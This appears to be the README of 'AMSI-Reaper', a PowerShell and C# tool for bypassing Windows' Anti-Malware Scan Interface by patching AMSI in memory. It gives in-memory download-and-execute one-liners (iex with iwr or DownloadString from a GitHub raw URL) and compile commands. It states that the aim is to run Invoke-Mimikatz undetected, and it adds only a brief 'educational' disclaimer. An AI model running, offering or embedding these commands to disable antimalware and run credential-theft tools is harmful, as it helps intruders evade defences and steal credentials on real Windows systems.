- AMSI-Reaper is a tool developed in both PowerShell and C# (.NET Framework v4.0) designed to bypass the Anti-Malware Scan Interface (AMSI) in Windows.
- AMSI is a built-in security feature in Windows that allows applications and services to integrate with antimalware products.
- By default, it provides a layer of protection against potentially malicious scripts and code executed in applications like PowerShell.
- Check out more on the YouTube Video
- Bypass AMSI: AMSI-Reaper injects code into the memory of the AMSI components, preventing them from interfering with your scripts.
- PowerShell and C# Support: The tool is available in both PowerShell and C# versions, making it adaptable to different use cases.
- AMSI-Reaper requires Administrator privileges to function correctly. Please run the tool as an Administrator.
iex (iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1)
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.ps1')
wget https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs
iwr https://raw.githubusercontent.com/h0ru/AMSI-Reaper/main/src/AMSI-Reaper.cs -O AMSI-Reaper.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AMSI-Reaper.cs
- The AMSI-Reaper tool is meant for educational and research purposes only. The author is not responsible for any misuse, damage, or legal consequences caused by the use of this tool.
- Invoke-Mimikatz is detected and blocked by AMSI
- With AMSI-Reaper in PowerShell, we can request and use it from the command line in real-time, all in memory.
- Alternatively, you can also use AMSI-Reaper in C# with native Windows features by compiling it with csc.
